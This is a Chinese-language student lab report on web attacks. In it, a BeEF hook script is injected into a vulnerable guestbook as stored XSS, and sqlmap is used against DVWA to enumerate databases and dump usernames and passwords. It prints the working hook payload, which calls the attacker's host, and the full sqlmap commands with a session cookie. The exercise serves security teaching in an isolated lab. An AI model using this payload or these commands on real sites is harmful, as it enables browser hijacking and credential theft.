XSS與SQL隱碼攻擊
XSS與SQL隱碼攻擊
實驗目的
瞭解什麼是XSS;瞭解XSS攻擊實施,理解防禦XSS攻擊的方法;瞭解SQL隱碼攻擊的基本原理;掌握PHP指令碼訪問MySQL資料庫的基本方法;掌握程式設計中避免出現SQL隱碼攻擊漏洞的基本方法;掌握網站配置。
系統環境
Kali Linux 2、Windows Server
網路環境
交換網路結構
實驗工具
Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
實驗步驟
XSS部分
利用Beef劫持被攻擊者客戶端瀏覽器。
實驗環境搭建。
角色:留言簿網站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻擊者:Kali(使用beEF生成惡意程式碼,並通過留言方式提交到留言簿網站);
被攻擊者:訪問留言簿網站,瀏覽器被劫持。
首先搭建留言簿網站
1、利用AWVS掃描留言簿網站,發現其存在XSS漏洞
掃描結果發現error.asp和add.asp都存在XSS漏洞:
2、Kali使用beef生成惡意程式碼
Kali中開啟beef
瀏覽器開啟連結:http://127.0.0:3000/ui/panel並登陸,賬號密碼均為beef
> 按照格式生成惡意程式碼:<script src="http://192.168.248.138:3000/hook.js"></script>
3、訪問http://留言簿網站/message.asp;將以下惡意程式碼寫入網站留言板
在kali中訪問留言簿網站並寫入惡意程式碼:
提交後可以看到這個頁面:
此時可以看見beef中的變化:
3、管理員登入login.htm,賬號密碼均為admin,稽核使用者留言。只要客戶端訪問這個伺服器的留言板,客戶端瀏覽器就會被劫持,指定被劫持網站為學校主頁,將你在beff中的配置截圖。
將劫持網站改為學校主頁:
之後再訪問留言簿網站可以看到網站跳轉為學校主頁:
5、回答問題:實驗中XSS攻擊屬於哪種型別?
儲存型XSS
XQL注入部分
下頁還有SQL隱碼攻擊,請繼續!
SQL隱碼攻擊部分:DVWA+SQLmap+Mysql注入實戰
實驗環境搭建。啟動Metasploitable2虛擬機器。
1、注入點發現。首先肯定是要判斷是否有注入漏洞。
首先將安全級別設為low:
在輸入框輸入1,返回 ID: 1 First name: admin Surname: admin 返回正常;
再次輸入1’,報錯,返回:
此時可以斷定有SQL隱碼攻擊漏洞。
得到url:http://192.168.43.104/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#
下面利用SQLMap進行注入攻擊。
2、列舉當前使用的資料庫名稱和使用者名稱。
獲取cookie值:F12
輸入的命令:
sqlmap -u
“http://192.168.43.104/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=26152ac71760ec5d8a35195f1558adf3’ -b --current-db --current-user
sqlmap輸出:
3、列舉資料庫使用者名稱和密碼
輸入的命令: sqlmap -u
“http://192.168.43.104/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=26152ac71760ec5d8a35195f1558adf3’ --users --password
Sqlmap輸出:
4、列舉資料庫
輸入的命令: sqlmap -u
“http://192.168.43.104/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=26152ac71760ec5d8a35195f1558adf3’ --dbs
–dbs
Sqlmap輸出:
5、列舉資料庫和指定資料庫的資料表
-D 資料庫名:指定資料庫
–tables:列舉指定資料庫的所有表
輸入的命令: sqlmap -u “http://192.168.43.104/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=26152ac71760ec5d8a35195f1558adf3’ -D dvwa --tables
Sqlmap輸出:
6、獲取指定資料庫和表中所有列的資訊
-D:指定的資料庫
-T:指定資料庫中的資料表
–columns:獲取列的資訊
輸入的命令: sqlmap -u “http://192.168.43.104/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=26152ac71760ec5d8a35195f1558adf3’ -D dvwa -T users --columns
Sqlmap輸出:
7、列舉指定資料表中的所有使用者名稱與密碼,並down到本地。
-C:列舉資料表中的列
–dump:儲存資料表項
輸入的命令: sqlmap -u “http://192.168.43.104/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#”
–cookie=‘security=low; PHPSESSID=26152ac71760ec5d8a35195f1558adf3’ -D dvwa -T users -C user,password --dump
Sqlmap輸出:
相關文章
- SQL隱碼攻擊SQL
- 【SQL Server】--SQL隱碼攻擊SQLServer
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句注入SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句修改SQL
- MYSQL SQL隱碼攻擊MySql
- 【SQL隱碼攻擊原理】SQL
- 防止SQL隱碼攻擊SQL
- SQL隱碼攻擊(一)SQL
- SQL隱碼攻擊(pikachu)SQL
- SQL隱碼攻擊方法SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-驗證檢查SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-繫結變數SQL變數
- WEB三大攻擊之—SQL隱碼攻擊與防護WebSQL
- SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊?SQL
- 讓你徹底瞭解SQL隱碼攻擊、XSS和CSRFSQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-顯式格式化模型SQL模型
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-資料型別轉換SQL資料型別
- 在Linux中,如何檢測和防止SQL隱碼攻擊和跨站指令碼(XSS)攻擊?LinuxSQL指令碼
- SQL隱碼攻擊式攻擊掃描器SQL
- SQL隱碼攻擊語句SQL
- pikachu-SQL隱碼攻擊SQL
- SQL隱碼攻擊導圖SQL
- SQL隱碼攻擊問題SQL
- SQL隱碼攻擊的例子SQL
- ZMLCMS-SQL隱碼攻擊SQL
- SQL隱碼攻擊演練SQL
- 預防SQL隱碼攻擊SQL
- SQL隱碼攻擊總結SQL
- DVWA-SQL Injection(SQL隱碼攻擊)SQL
- WordPress SQL隱碼攻擊漏洞與提權分析SQL
- SQL隱碼攻擊的分類與防範SQL
- 攻擊JavaWeb應用[3]-SQL隱碼攻擊[1]JavaWebSQL
- 攻擊JavaWeb應用[4]-SQL隱碼攻擊[2]JavaWebSQL
- 【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!SQL
- 網路滲透測試實驗三——XSS和SQL隱碼攻擊SQL
- 網路滲透測試實驗三-XSS和SQL隱碼攻擊SQL
- SQL隱碼攻擊關聯分析SQL